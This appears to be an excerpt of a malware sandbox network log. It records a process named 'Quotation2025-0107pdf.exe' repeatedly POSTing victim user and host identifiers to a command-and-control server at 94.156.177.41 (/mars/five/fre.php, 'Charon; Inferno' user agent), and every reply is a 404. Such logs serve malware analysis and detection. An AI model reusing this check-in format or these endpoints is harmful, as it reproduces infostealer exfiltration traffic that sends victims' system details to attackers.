Jan 7, 2025 12:32:59.003526926 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:59.720252037 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49837	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:59.874048948 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:59.878899097 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:00.607234955 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49843	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:00.748003960 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:00.752916098 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:01.490128040 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49849	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:01.657417059 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:01.662273884 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:02.395831108 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49857	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:02.544653893 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:02.549470901 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:03.285850048 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49863	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:03.469852924 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:03.476176023 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:04.228163004 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49869	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:04.415663958 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:04.420628071 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:05.134998083 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49875	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:05.285053968 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:05.289916992 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:06.011332035 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49882	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:06.152837992 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:06.157706022 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:06.893781900 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49888	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:07.163446903 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:07.168337107 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:07.922079086 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49898	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:08.060486078 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:08.065315962 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:08.808722019 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49904	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:08.978569984 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:08.983613014 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:09.719271898 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49910	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:10.029778004 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:10.036766052 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:10.771178007 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49918	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:10.920401096 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:10.925246954 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:11.659181118 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49927	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:11.835064888 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:11.841098070 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:12.593288898 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49933	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:12.949012995 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:12.953871965 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:13.817610025 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49941	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:13.968759060 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:13.973578930 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:14.698565960 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49950	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:14.841795921 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:14.849018097 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:15.582880974 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49956	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:15.799093008 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:15.804831028 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:16.529642105 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49962	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:16.678096056 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:16.682924986 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:17.415369034 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:17 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49968	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:17.561273098 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:17.566164017 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:18.317682028 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49974	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:18.609121084 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:18.615544081 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
